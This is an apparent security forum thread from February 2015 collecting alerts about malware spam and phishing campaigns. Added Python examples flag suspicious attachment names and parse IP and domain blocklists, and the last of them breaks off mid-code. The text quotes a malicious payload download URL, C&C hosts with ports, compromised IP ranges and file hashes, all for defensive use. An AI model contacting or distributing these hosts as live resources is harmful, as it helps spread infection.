- https://isc.sans.edu/diary.html?storyid=19261
2015-01-31 - "Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday and the spam and phishing emails are -pouring- in complete with helpful -links- back-ended by malware and/or credential harvesting:
> https://isc.sans.edu/diaryimages/images/superbowl.PNG
... worth a reminder to friends and family if they see any emails about the Super Bowl that appears to be too-good-to-be-true - delete it..."
:fear::fear:
AplusWebMaster
2015-02-02, 19:30
FYI...
Fake 'Facebook Account' SPAM - PDF malware
- http://myonlinesecurity.co.uk/facebook-account-suspended-fake-pdf-malware/
2 Feb 2015 - "'Facebook Account Suspended' pretending to come from Facebook <noreply@ mail .fb .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link and run the downloaded file... Google seems to be -ignoring- the report to take down this url so far today or are far too busy complaining about Microsoft and other program makers not issuing patches inside the 90 day time period that Google insist on, to do something really useful in actually protecting users from malware like this one... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/facebook-account-suspended.png
2 February 2015 : TermsPolicies.pdf.exe - Current Virus total detections: 11/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9af89f66fb76b016dcf0ab984c35b3948f0f04e828509c083637a8498d3e81dc/analysis/1422881129/
___
Fake 'Your Apple ID' - Phish ...
- http://myonlinesecurity.co.uk/apple-idwas-used-restore-device-one-icloud-backups-phishing/
2 Feb 2015 - "'Your Apple ID,was used to restore a device from one of your iCloud backups' pretending to come from Apple iTunes <orders@ tunes .co .uk> is one of the latest phish attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The original email looks like this. It will NEVER be a genuine email from Apple or any other company, so don’t ever click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Apple website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email. This one has a short url link ( https ://tr .im/JxUNR) in the email which -redirects- you... When you fill in your user name and password you get a page looking very similar to this one (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use social engineering tricks to persuade you to open the attachments that come with the email..."
(Screenshots available at the myonlinesecurity URL at the top of this post.)
___
Facebook porn video trojan affects 110K users in 2 days
- http://www.theinquirer.net/inquirer/news/2393198/facebook-porn-video-trojan-affects-110-000-users-in-two-days
Feb 02 2015 - "A TROJAN that has spread itself by posting links to a pornographic video has affected over 110,000 Facebook users in just 48 hours. The malware spreads from the account of previously infected users of the social network, tagging around 20 of their friends. If someone opens the link contained in the post, they will get a preview of a porn video which eventually stops and asks for a fake Flash player to be downloaded which contains the malware. The malware was uncovered by a security researcher called Mohammad Reza Faghan, who posted information about it on security mailing list archive Seclists.org*... the Trojan is different from previous examples seen on Facebook, which sent messages on behalf of the victim to a number of the victim's friends. Upon infection of those friends, the malware could go one step further and infect the friends of the initial friends. In the new technique, however, the malware has more visibility to the potential victims as it tags the friends of the victim in the malicious post. The malware is thought to be able to hijack keyboard and mouse movements if executed successfully once landing on a victim's machine."
* http://seclists.org/fulldisclosure/2015/Jan/131
___
Fake Chrome update Spam drops CTB Locker/Critroni Ransomware
- https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/
Feb 2, 2015 - "Beware of emails appearing to come from Google warning you that “Your version of Google Chrome is potentially vulnerable and out of date”. In this latest spam wave, cyber crooks are tricking users into downloading the well-known browser, except that it’s a dangerous Trojan that will encrypt your personal files and demand a hefty ransom to decrypt them back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/spam.png
The payload is not attached to the email but instead gets downloaded from various websites that appear to have been compromised... Running “ChromeSetup.exe” will not install Google Chrome. Instead the Windows wallpaper will change to this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted1.png
This is not just a fake warning. The files on the systems are -indeed- encrypted:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted4.png
The bad guys demand a ransom that can be paid using Bitcoins:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted8.png
... The problem with ransomware is that while the active Trojans can be removed, it is much more difficult and sometimes impossible to recover the encrypted files. The folks at BleepingComputer* have some tips on how to restore your encrypted files. However, as is often the case, prevention is critical to avoid a nasty ransomware infection..."
* http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information#shadow
- http://net-security.org/malware_news.php?id=2952
03.02.2015
> http://www.net-security.org/images/articles/chrome-mal-03022015.jpg
:fear::fear: :mad:
AplusWebMaster
2015-02-03, 14:46
FYI...
Fake 'CIT' SPAM – doc malware
- http://myonlinesecurity.co.uk/cit-inv-15000375-po-sp14161-word-doc-malware/
3 Feb 2015 - "'CIT Inv# 15000375 for PO# SP14161' pretending to come from Circor <_CIG-EDI@ CIRCOR .COM> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/CIT-Inv-15000375-for-PO-SP14161.png
3 February 2015: FOPRT01.DOC - Current Virus total detections: 1/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/476eaa256c7a17e93e18312bc00049f9a838097bbdab8b8a56d581e3948dca23/analysis/1422951071/
- http://blog.dynamoo.com/2015/02/malware-spam-circor-cig-edicircorcom.html
3 Feb 2015
"... Recommended blocklist:
143.107.17.183
92.63.88.108 "
___
Fake 'Barclays Your Debit Card' – Phish ...
- http://myonlinesecurity.co.uk/barclays-debit-card-notification-phishing/
3 Feb 2015 - "'Your Debit Card Notification' pretending to come from Barclays Bank Plc is one of the latest phish attempts to steal your Barclays Bank, debit card and personal details. This one only wants your Barclays log in details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The website at gardendecore .pl have cleaned up the phishing pages and hopefully plugged the security holes or vulnerabilities that let the bad guys get in in the first place. If you follow the link you see a webpage looking like the genuine Barclays log in page:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_-feb_2015.png
When you fill in the required details there, the phishers then send you on to the next page where they ask you to fill in your name, details and passcodes. The phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Garrett' SPAM - malware
- http://myonlinesecurity.co.uk/pulsar-instruments-plc-garrett-courtright-copy-07441489933-malware/
3 Feb 2015 - "'Garrett Courtright Copy from +07441489933' pretending to come from Garrett Courtright <ophidian@ nagsgolf .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fax: +07441489933
Date: 2015/01/18 16:43:04 CST
Pages: 1
Reference number: Y67969682C281D
Filename: pulsar_instruments_plc57.zip
Pulsar Instruments Plc
Garrett Courtright
3 February 2015 : pulsar_instruments_plc57.zip: Extracts to: pulsar_instruments_plc57.scr
Current Virus total detections: 7/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c02902664a73255408adc93bb1b0b8075759eacbf16dbb9a88c96343f46818b3/analysis/1422985036/
... Behavioural information
TCP connections
213.186.33.2: https://www.virustotal.com/en/ip-address/213.186.33.2/information/
5.178.43.10: https://www.virustotal.com/en/ip-address/5.178.43.10/information/
___
Fake 'Halifax' SPAM – Phish ...
- http://myonlinesecurity.co.uk/update-account-details-halifax-phishing/
3 Feb 2015 - "'Update your account details' pretending to come from Halifax Online Banking <securitynews@halifax.co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. An alternative email says 'We’re improving your Halifax account' also pretending to come from Halifax Online Banking <securitynews@ halifax .co .uk>. This one wants all your personal details including email address and password and your credit card and bank details. Many of them are also designed to specifically steal your facebook and other social network log in details as well... don’t -ever- open or fill in the html (webpage) form that comes attached to the email... If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to follow a link in the body of the email to a phishing site. Both of today’s emails have different phish sites in the attached html files but otherwise the attachments are identical.
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_2.png
-or-
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_1.png
If you open the attached html file you see a webpage looking like this (split in 2 to get it all):
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax1-1024x587.png
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax21-1024x620.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear: :mad:
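Several posts in this thread turn on the same trick: an executable named and iconed to pass as a document (the 'TermsPolicies.pdf.exe' in the Facebook lure above, the 'pulsar_instruments_plc57.scr' inside a zip in this post), alongside macro-carrying Word attachments such as 'FOPRT01.DOC'. The script below is an added example, not code from myonlinesecurity or dynamoo, showing how a mail gateway or triage script can flag those names before a user ever sees an icon: it checks the final extension, the decoy-then-executable double extension, macro-capable Office formats, and the member names inside a zip attachment. The extension sets and the in-memory sample zip are constructed for the example.

```python
import io
import zipfile
from typing import Dict, List, Optional

# Extensions Windows runs as code on double-click (constructed list, extend to taste).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "ps1"}
# Harmless-looking extensions the lures imitate (the "pdf" in "x.pdf.exe").
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
# Office formats that can carry macros, as in the "doc malware" posts.
MACRO_EXTS = {"doc", "docm", "xls", "xlsm", "rtf"}


def split_exts(name: str) -> List[str]:
    """Return the lower-cased extension chain of a filename, e.g. ['pdf', 'exe']."""
    base = name.lower().rsplit("/", 1)[-1]   # ignore any directory part in zip members
    parts = base.split(".")
    return parts[1:] if len(parts) > 1 else []


def check_name(name: str) -> List[str]:
    """Reasons a single filename is suspicious; empty list means nothing notable."""
    reasons: List[str] = []
    exts = split_exts(name)
    if not exts:
        return reasons
    final = exts[-1]
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{final}")
    # "report.pdf.exe": a decoy extension immediately before the executable one.
    if len(exts) >= 2 and exts[-2] in DECOY_EXTS and final in EXECUTABLE_EXTS:
        reasons.append(f"double extension .{exts[-2]}.{final}")
    if final in MACRO_EXTS:
        reasons.append(f"macro-capable document .{final}")
    return reasons


def check_attachment(name: str, data: Optional[bytes] = None) -> List[str]:
    """Check an attachment name and, for zips, every member name inside it."""
    reasons = check_name(name)
    if data is not None and name.lower().endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    for r in check_name(member):
                        reasons.append(f"archive member {member}: {r}")
        except zipfile.BadZipFile:
            reasons.append("attachment has .zip name but is not a valid zip")
    return reasons


def build_sample_zip(members: Dict[str, bytes]) -> bytes:
    """Constructed test fixture: an in-memory zip with the given member names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, content in members.items():
            zf.writestr(member, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Names taken from the posts in this thread; the zip content is a constructed stub.
    sample_zip = build_sample_zip({"pulsar_instruments_plc57.scr": b"MZ stub"})
    for fname, payload in [("TermsPolicies.pdf.exe", None),
                           ("FOPRT01.DOC", None),
                           ("pulsar_instruments_plc57.zip", sample_zip),
                           ("invoice.pdf", None)]:
        print(fname, "->", check_attachment(fname, payload) or "ok")
```

The check is deliberately name-based: it is cheap enough to run on every inbound message and catches exactly the class of lure these posts describe, regardless of how new the binary is to antivirus engines (the posts quote detection rates of 4/56 to 12/57 on the day of the run). Content inspection of the file itself belongs in a second, slower stage.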
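The "Recommended blocklist" quoted from dynamoo in this post, and the indicator lists elsewhere in this thread (dots written as " ." so that nothing is clickable, CIDR ranges such as 5.196.143.0/28, hosts with a C&C port appended), are meant to be fed into a firewall, proxy or SIEM. The following is an added example, not dynamoo's or Cyphort's code: it refangs such a list, separates IP and CIDR entries from domain:port entries, and answers whether a given address or hostname falls under it. The indicator text is assembled from values quoted in this thread, and the " ." spacing is assumed to be the only defanging convention present.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import List, Set, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]

# Constructed from indicators quoted in this thread, in the blogs' defanged form.
RAW_INDICATORS = """
143.107.17.183
92.63.88.108
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties .com:4444
pratikconsultancy .com:8080
"""


def refang(token: str) -> str:
    """Undo the ' .' / '[.]' / 'hxxp' conventions blogs use to make indicators unclickable."""
    return token.strip().replace(" .", ".").replace("[.]", ".").replace("hxxp", "http")


@dataclass
class Blocklist:
    networks: List[Network] = field(default_factory=list)
    domains: Set[str] = field(default_factory=set)

    @classmethod
    def parse(cls, text: str) -> "Blocklist":
        bl = cls()
        for line in text.splitlines():
            tok = refang(line)
            if not tok or tok.startswith("#"):
                continue
            # A bare address parses as a /32 network, so one branch covers IPs and ranges.
            try:
                bl.networks.append(ipaddress.ip_network(tok, strict=False))
                continue
            except ValueError:
                pass
            # Anything else is treated as host[:port]; the port is dropped (IPv4-era list).
            host = tok.rsplit(":", 1)[0].lower().rstrip(".")
            bl.domains.add(host)
        return bl

    def matches_ip(self, ip: str) -> List[str]:
        """Every listed network containing ip, as strings; empty if none."""
        addr = ipaddress.ip_address(ip)
        return [str(n) for n in self.networks if addr in n]

    def matches_host(self, host: str) -> bool:
        """Exact or subdomain match against the listed domains."""
        h = host.lower().rstrip(".")
        return any(h == d or h.endswith("." + d) for d in self.domains)


if __name__ == "__main__":
    bl = Blocklist.parse(RAW_INDICATORS)
    # Sample lookups: addresses inside and just outside the quoted ranges.
    for ip in ("5.196.143.3", "5.196.143.16", "5.196.141.24", "143.107.17.183"):
        print(ip, "->", bl.matches_ip(ip) or "not listed")
    for host in ("asthalproperties.com", "www.pratikconsultancy.com", "example.com"):
        print(host, "->", bl.matches_host(host))
```

Because both single addresses and ranges end up as network objects, a log line's source IP can be checked with one membership pass, and the /28 and /29 from the OVH ranges are handled without enumerating their hosts.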
AplusWebMaster
2015-02-04, 19:27
FYI...
Fake 'USPS Delivery' SPAM – doc malware
- http://myonlinesecurity.co.uk/usps-delivery-notification-word-doc-malware/
4 Feb 2015 - "'USPS Delivery Notification' pretending to come from USPS <no-reply@ usps .gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/USPS-Delivery-Notification-1024x614.png
4 February 2015: label_54633541.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/5ac0c18b4743626c3c49492cd7470c1b4060c553705bb49612a5d1b2be0c2fb5/analysis/1423064590/
___
Pawn Storm Update: -iOS- Espionage App Found
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
Feb 4, 2015 - "... spyware specifically designed for espionage on -iOS- devices. While spyware targeting -Apple- users is highly notable by itself, this particular spyware is also involved in a targeted attack... Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities, like the military, governments, defense industries, and the media. The actors of Pawn Storm tend to first move a lot of pawns in the hopes they come close to their actual, high profile targets. When they finally successfully infect a high profile target, they might decide to move their next pawn forward: advanced espionage malware... The iOS malware we found is among those advanced malware. We believe the iOS malware gets installed on already compromised systems, and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems... The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server. As of this publishing, the C&C server contacted by the iOS malware is -live- ...
C&C Communication: Besides collecting information from the iOS device, the app sends the information out via HTTP. It uses POST requests to send messages, and GET requests to receive commands... The exact method of installing this malware is unknown. However, we do know that the iOS device doesn’t have to be jailbroken per se. We have seen one instance wherein a lure involving XAgent simply says “Tap Here to Install the Application.” The app uses Apple’s ad hoc provisioning, which is a standard distribution method of Apple for iOS App developers. Through ad hoc provisioning, the malware can be installed simply by clicking-on-a-link, such as in the picture below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/pwnstrm10.png
There may be other methods of infection that are used to install this particular malware. One possible scenario is infecting an iPhone* after connecting it to a compromised -or- infected Windows laptop via a USB cable...
* http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/
The hashes of the related files are:
05298a48e4ca6d9778b32259c8ae74527be33815
176e92e7cfc0e57be83e901c36ba17b255ba0b1b
30e4decd68808cb607c2aba4aa69fb5fdb598c64 ..."
- http://arstechnica.com/security/2015/02/spyware-aimed-at-western-governments-journalists-hits-ios-devices/
Feb 4 2015
___
Apps on Google Play Pose As Games - Infect Millions with Adware
- https://blog.avast.com/2015/02/03/apps-on-google-play-pose-as-games-and-infect-millions-of-users-with-adware/
Feb 3, 2015 - "A couple of days ago, a user posted a comment on our forum* regarding apps harboring adware that can be found on Google Play. This didn’t seem like anything spectacular at the beginning, but once I took a closer look it turned out that this malware was a bit bigger than I initially thought. First of all, the apps are on Google Play, meaning that they have a huge target audience – in English speaking and other language regions as well. Second, the apps were already downloaded by millions of users and third, I was surprised that the adware led to some legitimate companies:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-game-GP.png
The Durak card game app was the most widespread of the malicious apps with 5–10 million installations according to Google Play:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-1-player-2-player-rules-300x168.png
When you install Durak, it seems to be a completely normal and well working gaming app. This was the same for the other apps, which included an IQ test and a history app. This impression remains until you reboot your device and wait for a couple of days. After a week, you might start to feel there is something wrong with your device. Some of the apps wait up to 30 days until they show their true colors. After 30 days, I guess not many people would know which app is causing abnormal behavior on their phone, right? Each time you unlock your device an ad is presented to you, warning you about a problem, e.g. that your device is infected, out of date or full of porn. This, of course, is a complete lie. You are then asked to take action, however, if you approve you get re-directed to harmful threats on fake pages, like dubious app stores and apps that attempt to send premium SMS behind your back or to apps that simply collect too much of your data for comfort while offering you no additional value.
> https://blog.avast.com/wp-content/uploads/2015/02/Threats-detected-malcious-apps-300x261.jpg
An even bigger surprise was that users were sometimes directed to security apps on Google Play. These security apps are, of course, harmless, but would security providers really want to promote their apps via adware? Even if you install the security apps, the undesirable ads popping up on your phone don’t stop. This kind of threat can be considered good social engineering. Most people won’t be able to find the source of the problem and will face fake ads each time they unlock their device. I believe that most people will trust that there is a problem that can be solved with one of the apps advertised “solutions” and will follow the recommended steps, which may lead to an investment into unwanted apps from -untrusted- sources... the apps’ descriptions should make users -skeptical- about the legitimacy of the apps. Both in English and in other languages such as German, they were written poorly: “A card game called ‘Durak’ – one of the most common and well known game”. The apps’ SHA256 hashes are the following:
BDFBF9DE49E71331FFDFD04839B2B0810802F8C8BB9BE93B5A7E370958762836
9502DFC2D14C962CF1A1A9CDF01BD56416E60DAFC088BC54C177096D033410ED
FCF88C8268A7AC97BF10C323EB2828E2025FEEA13CDC6554770E7591CDED462D "
* https://forum.avast.com/?topic=165003.0
___
Data Integrity: The Core of Security
- http://www.securityweek.com/data-integrity-core-security
Feb 4, 2015 - "... Companies spend huge sums of money every year to maintain a security perimeter designed to fend off cyber and insider threats. According to Gartner*, worldwide spending on information security will reach $71.1 billion in 2014, an increase of 7.9 percent over 2013. Total information security spending will grow a further 8.2 percent in 2015 to reach $76.9 billion. Other Gartner figures show that in 2013, average budget allocations for information security were 5.1% of the overall IT budget, up 8.5% from 2012. However, the majority of investments are aimed at bolstering traditional perimeter security defenses, which is a losing battle... if we can prevent data from leaving the organization or being modified, protecting against network breaches becomes less critical. Unfortunately, data is often left unsecured... When it comes to information security, 100 percent protection is unattainable. However, by supplementing traditional perimeter defense mechanisms with data integrity principles, organizations can significantly reduce their exposure to Sony scale data breaches."
* http://www.gartner.com/newsroom/id/2828722
___
YouTube dumps Flash for HTML5
- http://www.infoworld.com/article/2877283/web-development/youtube-dumps-flash-for-html5.html
Jan 30, 2015 - "In a blow to proprietary rich Internet plug-ins, YouTube, which had been a stalwart supporter of Adobe’s Flash plug-in technology, revealed this week that it now -defaults- to the HTML5 <video> tag. The move shows HTML5's continued march toward Web dominance... Late Apple founder Steve Jobs probably did the most to further the decline by refusing to support Flash on the company’s wildly popular iOS handheld devices. In fact, Flash shows a downward trajectory on W3Techs' report* on the number of websites using Adobe’s multimedia platform. It has -dropped- to 11.9 percent this month versus more than 15 percent a year ago. The numbers are far worse for Microsoft’s late-arriving Flash rival, Silverlight..."
* http://w3techs.com/technologies/details/cp-flash/all/all
:fear: :spider:
AplusWebMaster
2015-02-05, 18:45
FYI...
Fake HSBC SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-fake-pdf-malware/
5 Feb 2015 - "'HSBC Payment Advice' pretending to come from HSBC <no-replay@ hsbci .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Sir/Madam
Upon your request, attached please find payment e-Advice for your
reference.
Yours faithfully
HSBC
We maintain strict security standards and procedures to prevent
unauthorised access to information about you. HSBC will never contact
you by e-mail or otherwise to ask you to validate personal information
such as your user ID, password, or account numbers. If you receive such
a request, please call our Direct Financial Services hotline.
Please do not reply to this e-mail. Should you wish to contact us,
please send your e-mail to commercialbanking@ hsbc .co .uk and we will
respond to you.
Note: it is important that you do not provide your account or credit
card numbers, or convey any confidential information or banking
instructions, in your reply mail.
Copyright. The Hongkong and Shanghai Banking Corporation Limited 2005.
All rights reserved...
5 February 2015: HSBC-69695.zip: Extracts to: CashPro.exe
Current Virus total detections: 4/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1f89e7f265686922f62acb94d4dd193197190574c953fbcf81ec729c72dadd35/analysis/1423139205/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
93.157.100.56: https://www.virustotal.com/en/ip-address/93.157.100.56/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
___
Fake FedEx SPAM - malicious script
- http://blog.dynamoo.com/2015/02/malware-spam-unable-to-deliver-your.html
5 Feb 2015 - "This -fake- FedEx spam has a malicious script attached.
From: FedEx 2Day A.M.
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws.
Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated... but it is a bit clearer when deobfuscated... This script has a moderate detection rate of 9/56*, and downloads a file from:
http ://freesmsmantra .com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631
Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56**. Automated analysis tools... don't give much of a clue as it has been hardened against analysis."
* https://www.virustotal.com/en/file/7284754c52f850158c541e00b28ab7ae1516c8161738da11c64bd5b259b48e12/analysis/1423149508/
** https://www.virustotal.com/en/file/cfa3dccd88c033117bccee4e01958b20253bfb562d82a73fa6ab65874abd66db/analysis/1423148815/
50.31.134.98: https://www.virustotal.com/en/ip-address/50.31.134.98/information/
___
Fake Barclays SPAM – Phish ...
- http://myonlinesecurity.co.uk/new-barclays-service-important-notice-phishing/
5 Feb 2015 - "'New Barclays Service Important Notice' pretending to come from Barclays Service [mailto:secure@ barclaysalertid .com] is one of the latest phish attempts to steal your Barclays Bank details. We have been seeing a quite large increase in Barclays phishing emails over the last week or so. Today’s version is particularly well done with a domain that will fool a lot of people...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/barclaycard_phishing-email_1.png
If you follow-the-link, you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish1.png
You then get:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_check.png
Then you get this page which tries to convince you that various African IP addresses have accessed your account and scare you into going further:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish2.png
You then get the processing/checking screen again before being sent on to:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish3-1024x646.png
Where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and format. And then once again to the processing/checking screen before you are sent on to the final page where they say they will send you a new pinsentry device by post:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish4-1024x603.png
All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."
:fear: :mad:
AplusWebMaster
2015-02-06, 14:56
FYI...
Something evil on 5.196.143.0/28 and 5.196.141.24/29 ...
- http://blog.dynamoo.com/2015/02/something-evil-on-5196143028-and.html
6 Feb 2015 - "... interesting blog post from Cyphort* got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more). These are OVH IP ranges, suballocated to a customer called Verelox .com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers. The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24, 5.196.141.25, 5.196.141.26, 5.196.141.27
... The second range is 5.196.143.0/28 with apparently -compromised- servers at:
5.196.143.3, 5.196.143.4, 5.196.143.5, 5.196.143.6, 5.196.143.7, 5.196.143.8, 5.196.143.10, 5.196.143.11,
5.196.143.12, 5.196.143.13
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth -blocking- traffic to.
Note that Cyphort identify these C&C servers for the malware:
asthalproperties .com:4444
pratikconsultancy .com:8080
The following IPs and domain names all seem to be connected and I would recommend -blocking- at least the IP addresses and domains... other domains look like they are probably throwaway ones:
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties .com
pratikconsultancy .com ..."
(More detail at the dynamoo URL at the top of this post.)
* http://www.cyphort.com/gopego-malvertising-cryptowall/
___
Fake 'CashPro Online' SPAM – PDF malware
- http://myonlinesecurity.co.uk/cashpro-online-digital-certificate-fake-pdf-malware/
6 Feb 2015 - "'Your CashPro Online Digital Certificate' pretending to come from CashPro Online <no-replay@ cashpro .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear CashPro Customer,
This email is being sent to inform you that you have been granted a new
digital certificate for use with Bank of America CashPro Online.
Please open the attachment and you will be guided through a simple
process to install your new digital certificate.
If you have any questions or concerns, please contact the Bank of
America technical help desk.
Thank you for your business,
Bank of America
CashPro Online Security Team
Please do not reply to this email .
Copyright 2015 Bank of America Merrill Lynch. All rights reserved.
CashPro is a registered trademark of Bank of America Corporation.
6 February 2015: docs-20276.zip: Extracts to: docs.exe
Current Virus total detections: 3/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5387585bc905f6304b190493af158a714bdd0baed1be7e81db40407d4a92af01/analysis/1423239330/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
192.185.35.92: https://www.virustotal.com/en/ip-address/192.185.35.92/information/
71.18.62.202: https://www.virustotal.com/en/ip-address/71.18.62.202/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/
- http://threattrack.tumblr.com/post/110256192178/bank-of-america-cashpro-spam
Feb 6, 2015
docs.exe (1D38C362198AD67329FDF58B4743165E)
Tagged: bank of america, cashpro, Upatre
:fear::fear: :mad:
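The dynamoo blocklist quoted above mixes CIDR ranges with single host addresses. The following Python is an added example, not code from the dynamoo post or from this forum, showing how to check a list of observed destination IPs (for instance the "TCP connections" entries in the VirusTotal behavioural reports in these posts) against that blocklist, and how to render the same list as iptables DROP rules. The list of observed addresses is constructed for the example; 192.0.2.10 is a documentation address used only as a negative case.

```python
import ipaddress

# Blocklist exactly as given in the dynamoo post above: two suballocated OVH
# ranges plus the two Ramnode nameserver addresses.
DYNAMOO_BLOCKLIST = [
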